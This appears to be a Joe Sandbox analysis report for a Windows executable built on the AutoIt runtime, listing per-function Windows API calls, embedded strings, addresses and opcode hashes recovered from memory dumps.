                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 0-1645009161
                                                          • Opcode ID: e24aa8a35aa4bd79d5bf97e43f64d4cb540e8ad1add906a84e01c2ec1b1ca64a
                                                          • Instruction ID: 30e85ff65a02b1ba9b18660bbb43f1db2fca9e5376d2ca8abcbdeff3f23945db
                                                          • Opcode Fuzzy Hash: e24aa8a35aa4bd79d5bf97e43f64d4cb540e8ad1add906a84e01c2ec1b1ca64a
                                                          • Instruction Fuzzy Hash: BD810B71604625BBDB24BF65EC46FEF37A9AF26300F044024F905AB1D6EB70DA62C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 00193EF8
                                                          • _wcslen.LIBCMT ref: 00193F03
                                                          • _wcslen.LIBCMT ref: 00193F5A
                                                          • _wcslen.LIBCMT ref: 00193F98
                                                          • GetDriveTypeW.KERNEL32(?), ref: 00193FD6
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0019401E
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00194059
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00194087
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 1839972693-4113822522
                                                          • Opcode ID: 7375e924b37c94365493da57fd9bdd93ab16185036ae7fae0115b5c98f028bf1
                                                          • Instruction ID: f83e1454ffa2cb95528175e05f6910c6a6c1f1770ed88885f211ba93e20117d8
                                                          • Opcode Fuzzy Hash: 7375e924b37c94365493da57fd9bdd93ab16185036ae7fae0115b5c98f028bf1
                                                          • Instruction Fuzzy Hash: BD71E1326042119FCB10DF24D88086EB7F4FFA8754F54492DF8A597291EB30ED46CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 00185A2E
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00185A40
                                                          • SetWindowTextW.USER32(?,?), ref: 00185A57
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00185A6C
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00185A72
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00185A82
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00185A88
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00185AA9
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00185AC3
                                                          • GetWindowRect.USER32(?,?), ref: 00185ACC
                                                          • _wcslen.LIBCMT ref: 00185B33
                                                          • SetWindowTextW.USER32(?,?), ref: 00185B6F
                                                          • GetDesktopWindow.USER32 ref: 00185B75
                                                          • GetWindowRect.USER32(00000000), ref: 00185B7C
                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00185BD3
                                                          • GetClientRect.USER32(?,?), ref: 00185BE0
                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00185C05
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00185C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                          • String ID:
                                                          • API String ID: 895679908-0
                                                          • Opcode ID: 5b4234344d08f6323e003444e38f94217d1e808fbbb3a3c7a3592e055eae2029
                                                          • Instruction ID: bf9d211d377f09ac7396f5d8948ddc92b78461eb176a84f5ef5694d720a50a5c
                                                          • Opcode Fuzzy Hash: 5b4234344d08f6323e003444e38f94217d1e808fbbb3a3c7a3592e055eae2029
                                                          • Instruction Fuzzy Hash: BD715D31900B05AFDB20EFA8CE85AAEBBF6FF58705F104618E542A75A0D775AA44CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 0019FE27
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0019FE32
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0019FE3D
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 0019FE48
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0019FE53
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0019FE5E
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0019FE69
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0019FE74
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 0019FE7F
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0019FE8A
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0019FE95
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0019FEA0
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0019FEAB
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 0019FEB6
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0019FEC1
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0019FECC
                                                          • GetCursorInfo.USER32(?), ref: 0019FEDC
                                                          • GetLastError.KERNEL32 ref: 0019FF1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 93d2fa89dda4782cc7f0dfe3bba35aa27be95be8482096b1d7521075b07fe2c5
                                                          • Instruction ID: 9627e818304906eb233a534789b3f714bdd75e61f0f9b1b9efb7845b9d120023
                                                          • Opcode Fuzzy Hash: 93d2fa89dda4782cc7f0dfe3bba35aa27be95be8482096b1d7521075b07fe2c5
                                                          • Instruction Fuzzy Hash: 7D4142B1D08319AADB10DFBA8C8985EBFE8FF04754B50452AE11DE7281DB78A901CE91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001400C6
                                                            • Part of subcall function 001400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001F070C,00000FA0,EDB3701A,?,?,?,?,001623B3,000000FF), ref: 0014011C
                                                            • Part of subcall function 001400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001623B3,000000FF), ref: 00140127
                                                            • Part of subcall function 001400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001623B3,000000FF), ref: 00140138
                                                            • Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0014014E
                                                            • Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0014015C
                                                            • Part of subcall function 001400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0014016A
                                                            • Part of subcall function 001400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00140195
                                                            • Part of subcall function 001400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001401A0
                                                          • ___scrt_fastfail.LIBCMT ref: 001400E7
                                                            • Part of subcall function 001400A3: __onexit.LIBCMT ref: 001400A9
                                                          Strings
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00140122
                                                          • kernel32.dll, xrefs: 00140133
                                                          • SleepConditionVariableCS, xrefs: 00140154
                                                          • InitializeConditionVariable, xrefs: 00140148
                                                          • WakeAllConditionVariable, xrefs: 00140162
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 66158676-1714406822
                                                          • Opcode ID: cd80648122bcf953de0310e24cdd07c8a6797054592d01924aaebb9c5b28ebe5
                                                          • Instruction ID: 89a055f760e0abfb2420c068dbf870619500cc70f8b428b07e37c84a10152415
                                                          • Opcode Fuzzy Hash: cd80648122bcf953de0310e24cdd07c8a6797054592d01924aaebb9c5b28ebe5
                                                          • Instruction Fuzzy Hash: C8210B32A44710ABD7126BA9EC45B6933D4EF5CF61F010239FA01E36A2DB74DC408ED0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 176396367-1603158881
                                                          • Opcode ID: 3aa04eabe468abd536a43eb70874367ca2aef9358e1e046a945b24c8db36af7a
                                                          • Instruction ID: 5d28b5011e456921ff7f3f0701f4f17ba127413e9a8c46f16ceed6cbee7d369c
                                                          • Opcode Fuzzy Hash: 3aa04eabe468abd536a43eb70874367ca2aef9358e1e046a945b24c8db36af7a
                                                          • Instruction Fuzzy Hash: 64E1E631A00516ABCB18AF68C4517EEFBB1BF54B14F588129E466B7250DB30AF85DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharLowerBuffW.USER32(00000000,00000000,001BCC08), ref: 00194527
                                                          • _wcslen.LIBCMT ref: 0019453B
                                                          • _wcslen.LIBCMT ref: 00194599
                                                          • _wcslen.LIBCMT ref: 001945F4
                                                          • _wcslen.LIBCMT ref: 0019463F
                                                          • _wcslen.LIBCMT ref: 001946A7
                                                            • Part of subcall function 0013F9F2: _wcslen.LIBCMT ref: 0013F9FD
                                                          • GetDriveTypeW.KERNEL32(?,001E6BF0,00000061), ref: 00194743
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2055661098-1000479233
                                                          • Opcode ID: b9dd493b40f147597e0b8e0e00e04f74b13ab7c7200104e0cf33f0be29e70de5
                                                          • Instruction ID: 980a99a048fbd1f55ee340b37f61942f04407f9b3ba18bd41ce04070d26faa37
                                                          • Opcode Fuzzy Hash: b9dd493b40f147597e0b8e0e00e04f74b13ab7c7200104e0cf33f0be29e70de5
                                                          • Instruction Fuzzy Hash: 8EB122716083029FCB14DF28D890E6EB7E5BFA9764F50491DF496C7291E730D846CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 001AB198
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001AB1B0
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001AB1D4
                                                          • _wcslen.LIBCMT ref: 001AB200
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001AB214
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001AB236
                                                          • _wcslen.LIBCMT ref: 001AB332
                                                            • Part of subcall function 001905A7: GetStdHandle.KERNEL32(000000F6), ref: 001905C6
                                                          • _wcslen.LIBCMT ref: 001AB34B
                                                          • _wcslen.LIBCMT ref: 001AB366
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001AB3B6
                                                          • GetLastError.KERNEL32(00000000), ref: 001AB407
                                                          • CloseHandle.KERNEL32(?), ref: 001AB439
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AB44A
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AB45C
                                                          • CloseHandle.KERNEL32(00000000), ref: 001AB46E
                                                          • CloseHandle.KERNEL32(?), ref: 001AB4E3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 2178637699-0
                                                          • Opcode ID: 3e0e26e3f00d2ed1f0c4a91fb09ce94156d34e14df39724ffda45bfe141bfabb
                                                          • Instruction ID: 903c751e10f1f599a70f49b9748536c486689b89c80ad6c1d28810594764d117
                                                          • Opcode Fuzzy Hash: 3e0e26e3f00d2ed1f0c4a91fb09ce94156d34e14df39724ffda45bfe141bfabb
                                                          • Instruction Fuzzy Hash: 6EF19D355083809FCB14EF24D891B6EBBE1BF9A314F14855DF4899B2A2CB31EC45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenuItemCount.USER32(001F1990), ref: 00162F8D
                                                          • GetMenuItemCount.USER32(001F1990), ref: 0016303D
                                                          • GetCursorPos.USER32(?), ref: 00163081
                                                          • SetForegroundWindow.USER32(00000000), ref: 0016308A
                                                          • TrackPopupMenuEx.USER32(001F1990,00000000,?,00000000,00000000,00000000), ref: 0016309D
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001630A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                          • String ID: 0
                                                          • API String ID: 36266755-4108050209
                                                          • Opcode ID: 9309a7e52dfd1a10698a0d01848c58ab5c5445a2da85067cedd6f95c8bcb9bc9
                                                          • Instruction ID: 6470d35e23de876912ff4b38d38f229ea15277370b7b6f508e2bed0614efe542
                                                          • Opcode Fuzzy Hash: 9309a7e52dfd1a10698a0d01848c58ab5c5445a2da85067cedd6f95c8bcb9bc9
                                                          • Instruction Fuzzy Hash: A9714930644616BFFB259F64DC89FAABF69FF05324F204216F5246A1E0C7B1AD60CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 001B6DEB
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001B6E5F
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001B6E81
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B6E94
                                                          • DestroyWindow.USER32(?), ref: 001B6EB5
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 001B6EE4
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B6EFD
                                                          • GetDesktopWindow.USER32 ref: 001B6F16
                                                          • GetWindowRect.USER32(00000000), ref: 001B6F1D
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001B6F35
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001B6F4D
                                                            • Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 2429346358-3619404913
                                                          • Opcode ID: 5c8e737f732f1099944c1bc6b48e346261289aa65e4ab8ddd00ccfdd46ea155d
                                                          • Instruction ID: 622120c8db54105310bc1b113d5602ac6b470781af128875ecaa2b25b18defd9
                                                          • Opcode Fuzzy Hash: 5c8e737f732f1099944c1bc6b48e346261289aa65e4ab8ddd00ccfdd46ea155d
                                                          • Instruction Fuzzy Hash: 28717771504244AFDB21CF28DC58FBABBE9FBA9304F04051DF989872A1C774E946CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          • DragQueryPoint.SHELL32(?,?), ref: 001B9147
                                                            • Part of subcall function 001B7674: ClientToScreen.USER32(?,?), ref: 001B769A
                                                            • Part of subcall function 001B7674: GetWindowRect.USER32(?,?), ref: 001B7710
                                                            • Part of subcall function 001B7674: PtInRect.USER32(?,?,001B8B89), ref: 001B7720
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 001B91B0
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001B91BB
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001B91DE
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001B9225
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 001B923E
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 001B9255
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 001B9277
                                                          • DragFinish.SHELL32(?), ref: 001B927E
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001B9371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 221274066-3440237614
                                                          • Opcode ID: 8e08a94390f037b9588d03b3cf504b8c82ed51c953067c5d552901e57107f1ac
                                                          • Instruction ID: 8242514ac09cf838af79f331a35c836f1b8dd10e696dee823bf99616ca8ce54e
                                                          • Opcode Fuzzy Hash: 8e08a94390f037b9588d03b3cf504b8c82ed51c953067c5d552901e57107f1ac
                                                          • Instruction Fuzzy Hash: B6615971108301AFD701DF64DC85DAFBBE8FF99750F000A2EF695921A0DB709A59CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019C4B0
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0019C4C3
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0019C4D7
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0019C4F0
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0019C533
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0019C549
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0019C554
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0019C584
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0019C5DC
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0019C5F0
                                                          • InternetCloseHandle.WININET(00000000), ref: 0019C5FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                          • String ID:
                                                          • API String ID: 3800310941-3916222277
                                                          • Opcode ID: f8415f24a195d7c39be973c472f4d380979bb3f7c4974c332c19b8992b45e208
                                                          • Instruction ID: 23f0532a927b58244630e10154cd3ef3e5ac50c44afef213c9035614d9fd7b35
                                                          • Opcode Fuzzy Hash: f8415f24a195d7c39be973c472f4d380979bb3f7c4974c332c19b8992b45e208
                                                          • Instruction Fuzzy Hash: 90514BB1600209BFEF218FA5C988AAB7BFCFF08754F014519F98696650DB34E944DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 001B8592
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 001B85A2
                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 001B85AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 001B85BA
                                                          • GlobalLock.KERNEL32(00000000), ref: 001B85C8
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001B85D7
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001B85E0
                                                          • CloseHandle.KERNEL32(00000000), ref: 001B85E7
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001B85F8
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001BFC38,?), ref: 001B8611
                                                          • GlobalFree.KERNEL32(00000000), ref: 001B8621
                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 001B8641
                                                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001B8671
                                                          • DeleteObject.GDI32(00000000), ref: 001B8699
